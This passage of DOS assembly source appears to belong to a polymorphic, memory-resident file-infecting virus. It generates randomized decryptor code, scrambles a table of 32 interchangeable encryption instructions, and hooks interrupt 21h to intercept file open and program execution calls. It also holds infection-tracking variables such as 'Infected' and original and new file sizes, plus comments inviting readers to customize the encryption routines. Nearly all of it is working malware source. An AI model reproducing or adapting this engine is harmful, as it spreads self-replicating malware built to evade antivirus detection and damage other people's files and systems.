        CLD
        MOVSB
        CLD
        LODSB
        OR AL,DL
        CLD
        STOSB
        XOR AX,AX
        MOV WORD PTR DS:[ADDSI],DI
        CLD
        STOSW
        CALL CALL_EM
        CALL RND
        TEST AL,1H
        JNE HEAD_E
        CLD
        LODSB
        OR AL,DL
        CLD
        STOSB
        CALL CALL_EM
        MOV AL,DS:[BX+3H]
        MOV DH,DL
        NEG DH
        INC DH
        OR AL,DH
        CLD
        STOSB
        JMP SHORT HEAD_E1
HEAD_E: INC SI
        CLD
        MOVSB
        CLD
        LODSB
        MOV CL,4H
        SHL AX,CL
        PUSH CX
        MOV CL,DL
        SHL AL,CL
        POP CX
        SHR AX,CL
        CLD
        STOSB
HEAD_E1:MOV BYTE PTR DS:[FORCE],YES
        CALL CALL_EM
        MOV WORD PTR DS:[DOFF],DI
        MOV WORD PTR DS:[DEC_START],DI
        RETN
CALL_EM:CALL Fill
        CALL PUTCL
        RETN
HEAD@:

HOP:    DB 0E8H         ;CALL
        DB 0FCH         ;CLD
        DB 0B9H         ;MOV CX,
        DB 5EH          ;POP SI 5FH = POP DI
        DB 81H          ;ADD 
        DB 0C6H         ;SI       C7H = DI
        DB 56H          ;PUSH SI  57H = PUSH DI
        DB 89H          ;MOV 
        DB 0F7H         ;DI,SI 0FEH = SI,DI
        DB 06H          ;PUSH ES
        DB 0EH          ;PUSH CS
        DB 1FH          ;POP DS
        DB 0EH          ;PUSH CS
        DB 07H          ;POP ES
HOP@:


PUTCL:  PUSH AX
        CALL RND
        CMP BYTE PTR DS:[FORCE],YES
        JE PUTCL_F
        TEST AL,01H
        JNE PUTCL_NO
PUTCL_F:CMP BYTE PTR DS:[PUTCLD],YES
        JE PUTCL_NO
        MOV AL,DS:[BX+1H]
        CLD
        STOSB
        CALL Fill
        MOV BYTE PTR DS:[PUTCLD],YES
PUTCL_NO:CALL RND
        CMP BYTE PTR DS:[FORCE],YES
        JE PUTCL_F1
        TEST AL,1H
        JNE PUTCL_NO1
PUTCL_F1:CMP BYTE PTR DS:[PUTCX],YES
        JE PUTCL_NO1
        MOV AL,DS:[BX+2H]
        CLD
        STOSB
        MOV WORD PTR DS:[MOVCX],DI
        XOR AX,AX
        CLD
        STOSW
        CALL Fill
        MOV BYTE PTR DS:[PUTCX],YES 
PUTCL_NO1:MOV BYTE PTR DS:[Begin],1EH
        CMP BYTE PTR DS:[Memory],YES
        JE PUTCL_MEM
        CMP BYTE PTR DS:[File],COM
        JE PutCLRet
PUTCL_MEM:MOV BYTE PTR DS:[Begin],90H
        CMP BYTE PTR DS:[PUSHED],YES
        JE PutCLRet
        PUSH CX
        PUSH SI
        MOV SI,OFFSET HOP+9H
        MOV CX,5H
        CMP BYTE PTR DS:[Memory],NO
        JE PUTCL_LP1
        INC SI
        DEC CX
PUTCL_LP1:CLD
        MOVSB
        CALL Fill
        LOOP PUTCL_LP1
        POP SI
        POP CX
        MOV BYTE PTR DS:[PUSHED],YES
PutCLRet:POP AX
        RETN
PUTCL@:

RanFunction:PUSH AX
        PUSH BX
        PUSH DI
        MOV DI,OFFSET FunctionComp+2H
        MOV BYTE PTR DS:[FuncByte],0H
RanFuncLP:CMP BYTE PTR DS:[FuncByte],0FH
        JE RanFuncEnd
        CALL RND
        AND AL,3H
        MOV AH,3DH
        MOV BL,1H
        CMP AL,0H
        JE GotFunc
        MOV AH,4BH
        MOV BL,2H
        CMP AL,1H
        JE GotFunc
        MOV AH,6CH
        MOV BL,4H
        CMP AL,2H
        JE GotFunc
        MOV AH,Signal
        MOV BL,8H
        CMP AL,3H
        JNE RanFuncLP
GotFunc:TEST BYTE PTR DS:[FuncByte],BL
        JNE RanFuncLP
        OR BYTE PTR DS:[FuncByte],BL
        MOV BYTE PTR DS:[DI],AH
        ADD DI,0005H
        JMP SHORT RanFuncLP
RanFuncEnd:POP DI
        POP BX
        POP AX
        RETN

MemHead:MOV BYTE PTR DS:[PUTCLD],NO
        MOV BYTE PTR DS:[PUTCX],NO
        MOV BYTE PTR DS:[FORCE],NO
        MOV BYTE PTR DS:[PUSHED],NO
        MOV BX,OFFSET HOP
        CALL RanFunction
        MOV DI,DS:[DOFF]
        MOV SI,OFFSET FunctionComp
        MOV CX,OFFSET MemDecrypt-FunctionComp
        MOV WORD PTR DS:[JumpHandle+1H],DI
        MOV WORD PTR DS:[JumpHandle+3H],CS
        MOV AX,DS:[Vector21]
        MOV WORD PTR DS:[FunctionJump+1H],AX
        MOV AX,DS:[Vector21+2H]
        MOV WORD PTR DS:[FunctionJump+3H],AX
        CALL Fill
        CLD
        REP MOVSB
        MOV SI,OFFSET MemBuild
        MOV CX,0009H
MemHeadLP:CALL Fill
        CLD
        MOVSB
        LOOP MemHeadLP
        CALL CALL_EM
        CALL RND        
        AND AL,01H
        MOV DL,AL
        MOV AL,0BEH
        OR AL,DL
        CLD
        STOSB
        MOV AX,100H
        CLD
        STOSW
        CALL CALL_EM
        MOV AL,89H
        CLD
        STOSB
        MOV AL,0F7H
        MOV CL,DL
        SHL CL,1
        SHL CL,1
        SHL AX,CL
        PUSH CX
        MOV CL,DL
        SHL AL,CL
        POP CX
        SHR AX,CL
        CLD
        STOSB
        MOV BYTE PTR DS:[Force],YES
        CALL CALL_EM
        MOV WORD PTR DS:[DOFF],DI
        MOV WORD PTR DS:[DEC_START],DI
        RETN

        
MemTail:MOV SI,OFFSET TOP
        MOV DI,DS:[DOFF]
        MOV CX,6H
        CALL RND
        TEST AL,1H
        JE MemNoADD
        ADD SI,CX
MemNoAdd:CLD
        REP MOVSB
        PUSH DI            
        CALL Fill
        MOV AL,0EAH
        CLD
        STOSB
        MOV AX,OFFSET Handle21Pall
        CLD
        STOSW
        MOV AX,CS
        CLD
        STOSW
        POP AX
        MOV BX,AX
        SUB AX,DS:[DEC_START]
        NEG AX
        MOV WORD PTR DS:[BX-2H],AX
        MOV WORD PTR DS:[DOFF],DI
        MOV BX,DS:[INST]
        SHL BX,1H
        XOR DX,DX
        MOV AX,OFFSET Done-OFFSET Start
        DIV BX
        INC AX
        MOV DI,DS:[MOVCX]
        MOV WORD PTR DS:[DI],AX
        MOV BX,AX
        MOV DI,DS:[EOFF]
        MOV SI,OFFSET MemEncrypt
        MOV CX,OFFSET MemEncrypt@-OFFSET MemEncrypt
        MOV AX,DI
        CLD
        REP MOVSB
        MOV CX,BX
        CMP BYTE PTR DS:[ReturnFar],YES
        JE NoPush
        SUB DI,5H
        PUSH AX
        MOV AL,0EAH
        CLD
        STOSB
        MOV AX,DS:[Vector21]
        CLD
        STOSW
        MOV AX,DS:[Vector21+2H]
        CLD
        STOSW
        POP AX
NoPush: MOV BYTE PTR DS:[Busy_Flag],No
        MOV SI,100H
        MOV DI,SI
        INC AX
        JMP AX

MemEncrypt:RETN
MemLoop:MOV AX,OFFSET Encrypt
        CALL AX
        LOOP MemLoop
        XOR AX,AX
        POP ES
        POP DS
        POP BP
        POP SI
        POP DI
        POP DX
        POP CX
        POP BX
        POP AX
        RETF 0002H
        DB 0H,0H
MemEncrypt@:



FunctionComp:CMP AH,3DH
        JE MemDecrypt
        CMP AH,4BH
        JE MemDecrypt
        CMP AH,6CH
        JE MemDecrypt
        CMP AH,Signal
        JE MemDecrypt
FunctionJump:DB 0EAH,00H,00H,00H,00H
MemDecrypt:


LODSTO  DB 0ADH,0ABH
LODSTO@:

;   These instructions can be changed if you follow the formating
;    protocal

;   Example:    E1:    DB 00100100B                 ;2,I,N,W
;               ADD WORD PTR DS:[SI],CX
;               SUB WORD PTR DS:[SI],CX
;
;               This would change E1 so that it would add/sub the counter 
;                regs to every word encrypted
;
;

ETAB:   DW OFFSET E1-OFFSET ETAB,OFFSET E2-OFFSET ETAB,OFFSET E3-OFFSET ETAB,OFFSET E4-OFFSET ETAB,OFFSET E5-OFFSET ETAB
        DW OFFSET E6-OFFSET ETAB,OFFSET E7-OFFSET ETAB,OFFSET E8-OFFSET ETAB,OFFSET E9-OFFSET ETAB,OFFSET E10-OFFSET ETAB,OFFSET E11-OFFSET ETAB
        DW OFFSET E12-OFFSET ETAB,OFFSET E13-OFFSET ETAB,OFFSET E14-OFFSET ETAB,OFFSET E15-OFFSET ETAB,OFFSET E16-OFFSET ETAB,OFFSET E17-OFFSET ETAB
        DW OFFSET E18-OFFSET ETAB,OFFSET E19-OFFSET ETAB,OFFSET E20-OFFSET ETAB,OFFSET E21-OFFSET ETAB,OFFSET E22-OFFSET ETAB,OFFSET E23-OFFSET ETAB
        DW OFFSET E24-OFFSET ETAB,OFFSET E25-OFFSET ETAB,OFFSET E26-OFFSET ETAB,OFFSET E27-OFFSET ETAB,OFFSET E28-OFFSET ETAB,OFFSET E29-OFFSET ETAB
        DW OFFSET E30-OFFSET ETAB,OFFSET E31-OFFSET ETAB,OFFSET E32-OFFSET ETAB
        ;xxxxyyyy = xxxx EQUALS SIZE OF INSTRUCTION
        ;0xxx = INDIRECT  1xxx = LODSW
        ;x0xx = ADD       x1xx = NO ADD
        ;xx0x = WORD      xx1x = BYTE (ONLY COUNTS IF ADD BIT IS ZERO)
        ;xxx0 = [SI]      xxx1 = [SI+1H]
E1:     DB 01000000B                 ;4,I,A,W
        ADD WORD PTR DS:[SI],1234H
        SUB WORD PTR DS:[SI],1234H
E2:     DB 00110010B                 ;3,I,A,B
        ADD BYTE PTR DS:[SI],12H
        SUB BYTE PTR DS:[SI],12H
E3:     DB 01000011B                 ;4,I,A,B
        ADD BYTE PTR DS:[SI+1H],12H
        SUB BYTE PTR DS:[SI+1H],12H
E4:     DB 00100100B                 ;2,I,N
        ROR WORD PTR DS:[SI],CL
        ROL WORD PTR DS:[SI],CL
E5:     DB 00100100B                 ;2,I,N
        ROR BYTE PTR DS:[SI],CL 
        ROL BYTE PTR DS:[SI],CL
E6:     DB 00110101B                 ;3,I,N
        ROR BYTE PTR DS:[SI+1H],CL
        ROL BYTE PTR DS:[SI+1H],CL
E7:     DB 00100100B                 ;2,I,N
        NOT WORD PTR DS:[SI]
        NOT WORD PTR DS:[SI]
E8:     DB 00100100B                 ;2,I,N
        NOT BYTE PTR DS:[SI]
        NOT BYTE PTR DS:[SI]
E9:     DB 00110101B                 ;3,I,N
        NOT BYTE PTR DS:[SI+1H] 
        NOT BYTE PTR DS:[SI+1H]
E10:    DB 01000000B                 ;4,I,A,W   
        XOR WORD PTR DS:[SI],1234H
        XOR WORD PTR DS:[SI],1234H
E11:    DB 00110010B                 ;3,I,A,B
        XOR BYTE PTR DS:[SI],12H
        XOR BYTE PTR DS:[SI],12H        
E12:    DB 01000011B                 ;4,I,A,B   
        XOR BYTE PTR DS:[SI+1H],12
        XOR BYTE PTR DS:[SI+1H],12      
E13:    DB 00100100B                 ;2,I,N
        NEG WORD PTR DS:[SI]
        NEG WORD PTR DS:[SI]
E14:    DB 00100100B                 ;2,I,N   
        NEG BYTE PTR DS:[SI]    
        NEG BYTE PTR DS:[SI]
E15:    DB 00110101B                 ;3,I,N   
        NEG BYTE PTR DS:[SI+1H]
        NEG BYTE PTR DS:[SI+1H]
E16:    DB 00111000B                 ;3,L,A,W
        ADD AX,1234H
        SUB AX,1234H
E17:    DB 00111010B                 ;3,L,A,B
        ADD AH,12H
        SUB AH,12H
E18:    DB 00101010B                 ;2,L,A,B
        ADD AL,12H
        SUB AL,12H
E19:    DB 00111000B                 ;3,L,A,W   
        XOR AX,1234H
        XOR AX,1234H
E20:    DB 00101010B                 ;2,L,A,B
        XOR AL,12H
        XOR AL,12H
E21:    DB 00111010B                 ;2,L,N
        XOR AH,12H
        XOR AH,12H
E22:    DB 00101100B                 ;2,L,N   
        XOR AX,CX
        XOR AX,CX
E23:    DB 00101100B                 ;2,L,N
        XCHG AL,AH
        XCHG AL,AH
E24:    DB 00101100B                 ;2,L,N   
        NOT AX
        NOT AX
E25:    DB 00101100B                 ;2,L,N
        NOT AL
        NOT AL
E26:    DB 00101100B                 ;2,L,N
        NOT AH
        NOT AH
E27:    DB 00101100B                 ;2,L,N
        NEG AX
        NEG AX
E28:    DB 00101100B                 ;2,L,N   
        NEG AH
        NEG AH
E29:    DB 00101100B                 ;2,L,N 
        NEG AL
        NEG AL
E30:    DB 00101100B
        ROR AX,CL
        ROL AX,CL
E31:    DB 00101100B
        ROR AL,CL
        ROL AL,CL
E32:    DB 00101100B
        ROR AH,CL
        ROL AH,CL
ETAB@:

ALTTAB: MOV CX,7FH              ;Scramble Encryption table
ALTTABL:MOV DI,OFFSET ETAB
        MOV SI,DI
        CALL RND
        AND AX,1FH
        SHL AX,1H
        ADD DI,AX
        CALL RND
        AND AX,1FH
        SHL AX,1H
        ADD SI,AX
        CMP SI,DI
        JE ALTTABL
        MOV AX,DS:[SI]
        XCHG AX,DS:[DI]
        MOV WORD PTR DS:[SI],AX
        LOOP ALTTABL
        RETN
        DB ?
ALTTAB@:
Done:   DB ?


EOFF            DW ?
DOFF            DW ?
ADDSI           DW ?
SIZ             DW ?
MOVCX           DW ?
ECNT            DW ?
INST            DW ?
CALL_OFF        DW ?
DEC_START       DW ?
WRITE_BYTE      DB ?
PATH_END        DB ?
FillB           DB ?
FORCE           DB ?
PUTCLD          DB ?
PUTCX           DB ?
PUSHED          DB ?

Vector21        DD ?            ;Segment:Offset of INT 21H
DTA             DD ?            ;Segment:Offset of DTA
FileSeg         DD ?            ;Segment:Offset of file
FileDS          DW ?            ;Original Data Segment
AddSeg          DW ?
OldFileSize     DD ?
NewFileSize     DD ?
Infected        DB ?
Opened          DB ?
Attribute       DB ?
Memory          DB ?
ReturnFar       DB ?
FuncByte        DB ?
Busy_Flag       DB ?

MemDelete:
ImmuneBytes     DB 20H DUP(0)

First20         DB 20H DUP(0)

NewDTA          DB 128 DUP(0)

ENCRYPT:        DB 512 DUP(0)

JumpHandle      DB 5 DUP(0)             ;JMP CS:Handle21
 
DECRYPT         DB 0H

Vend:
CSEG ENDS
     END Start